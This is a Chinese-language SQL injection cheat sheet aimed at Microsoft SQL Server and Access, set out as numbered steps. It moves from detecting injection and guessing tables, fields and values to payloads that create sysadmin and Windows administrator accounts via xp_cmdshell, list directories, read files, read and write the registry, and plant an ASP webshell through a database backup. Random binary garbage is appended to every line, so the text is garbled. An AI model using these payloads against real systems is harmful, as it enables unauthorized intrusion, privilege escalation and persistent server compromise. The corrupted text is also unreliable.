1.判断是否有注入;and 1=1 ;and 1=2
QG3&��p�<
2.初步判断是否是mssql ;and user>0 ]�A+o>#n}x
�`I;F�$�`\
3.注入参数是字符'and [查询条件] and ''=' vjUp *R>�h
b�Gmx7�qt#
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ))T>jh����
WA�Ph�v-�6
5.判断数据库系统 S�#l5y�%&�
p]�T"|!�d�
;and (select count(*) from sysobjects)>0 mssql j�vw��wJ<K
�PK2�~fJB�
;and (select count(*) from msysobjects)>0 access QP(�BZJ��C
(z7+|JE.�
`�/IKdO*!S
q|(��W-h+�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 (<�c�7<_-H
anN#5�j�t
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 /X*oS�&�-M
�zfI}Q�}p�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 Acm<��-de�
}
cN�W^4F
9.(1)猜字段的ascii值(access) ~Y!kB:D5;~
MuI2?:~:*4
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �.*�/Fucr�
nk��=$B�(h
(2)猜字段的ascii值(mssql) \2e0|)aF�6
���zGlZ!t:
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ��L}k/9F.5
K_&MoyJJ9f
10.测试权限结构(mssql) pdVQ*�=c?M
��3O��f�c\
q�UJ�
ae�Q
p(� LZ)7/�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- aX6}6zu�br
KY9�n2�u&4
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- =:I+6P�lF@
�,��H
kj1x
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
z��j{s}*�
Yl^mAS[�w&
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- _}6q{}jn:c
��d��Jk9@u
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ,�!�Q�V�>=
t��?eH�'*>
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- @%�ECj)u`O
83�Ou9�E!W
;and 1=(select IS_MEMBER('db_owner'));-- z��Go|J�F
K\?]$dK��5
DBH#)4do@
r����,(Mu
11.添加mssql和系统的帐户 8p^B� �h�d
�� H`QQ�G!
;exec master.dbo.sp_addlogin username;-- D-p.kA3MJ�
;exec master.dbo.sp_password null,username,password;-- 5Rv�+zQ#GR
7(a2L&k^�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- j;~�%lg=)
A*yi"{F�Li
;exec master.dbo.xp_cmdshell 'net user username password ;{��Ux_JEg
��K�q6jw/T
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ����mI1H!
]$iqa"���{
;exec master.dbo.xp_cmdshell 'net user username password /add';-- :�l u5U�u~
O�6s.<`��\
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- &2.u%[gO[q
(R}��ii}�&
/F��/;G�*n
�_=XX~^I�,
12.(1)遍历目录 A<�Mt�K�b
f>$``�.O��
;create table dirs(paths varchar(100), id int) .�?W5��{�U
%�eWqQ3{P]
;insert dirs exec master.dbo.xp_dirtree 'c:\' hV�pCB,��
W�7No� ls{
;and (select top 1 paths from dirs)>0 ��9�WG{p[�
@* u�st>7�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) i�b6^x:HGU
�qCQ�./"8�
Mj�L)I�gT�
io�2)1cE&f
(2)遍历目录 4���F�t�1@
� Uk�z;0q�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �vw>��j�J
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 y(j�g#7)��
�^�Z��RYRA
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 W6c]-�p��c
?�9�+@+q��
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �I27,mS+]�
F�=a+z/xKT
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 &d�B-r&4;+
�%q�3$|��>
�!RvRGRSyF
l�Ejwgk {�
13.mssql中的存储过程 +�~zXDB�S9
7*+�]wEs
xp_regenumvalues 注册表根键, 子键 Q�P@<)`1t9
iI1n2>V3y�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 D=f7NVc�>Q
OW;tT=q�l�
xp_regread 根键,子键,键值名 [tT8_}v$LN
RBKO��M$7�
;exec xp_regread )eeN1G`rDE
JAc�_kl{4O
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 6=_�~�0PcY
l�:��|�D,q
xp_regwrite 根键,子键, 值名, 值类型, 值 �Dr3n�+Q��
�m��|tC24�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 f>j�wN�@�(
W�zq>JNn�y
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 $m$;v<P�Se
hS� [SRa'.
xp_regdeletevalue 根键,子键,值名 #I�l_J\��#
�J�97R���0
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 d��hPK�HrS
='?:z2lJ�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 q6#<�[ �4?
R6;Phdh<�>
)K��S��oq/
TA18� �gq�
14.mssql的backup创建webshell Lw�qC��~N�
-�;�(Q1)�&
use model =HDI \L�D<
h+~P�"i}&\
create table cmd(str image); ��K-vWa��2
H;ZH�q�cUX
insert into cmd(str) values (''); 7�u.�|XmUz
\`.F�\�Z��
backup database model to disk='c:\l.asp'; ^y.nDs%ZT7
vYmSKS����
-��F��/�st
BcWcdr+}9�
15.mssql内置函数 `�bI)�<B��
`�1` f*d
v
;and (select @@version)>0 获得Windows的版本号 U%��B(5�cC
r�t7<Q47QE
;and user_name()='dbo' 判断当前系统的连接用户是不是sa QWnndI_4�p
�`��m@U!X
;and (select user_name())>0 爆当前系统的连接用户 : ��9!%ZD
���'1SG(0
;and (select db_name())>0 得到当前连接的数据库 }l�0��&a!C
�| $^;wP�
U�
5�w:"x�
z$l�F)r:Bc
16.简洁的webshell CBT>"sY�E1
��|f( ~@Q:
use model |�k� 2"�_�
)�+y� G+��
create table cmd(str image); f'(l&/4�z{
`g�''�rfk}
insert into cmd(str) values (''); ���ITJ q�
V3��N0�Og3
backup database model to disk='g:\wwwtest\l.asp';
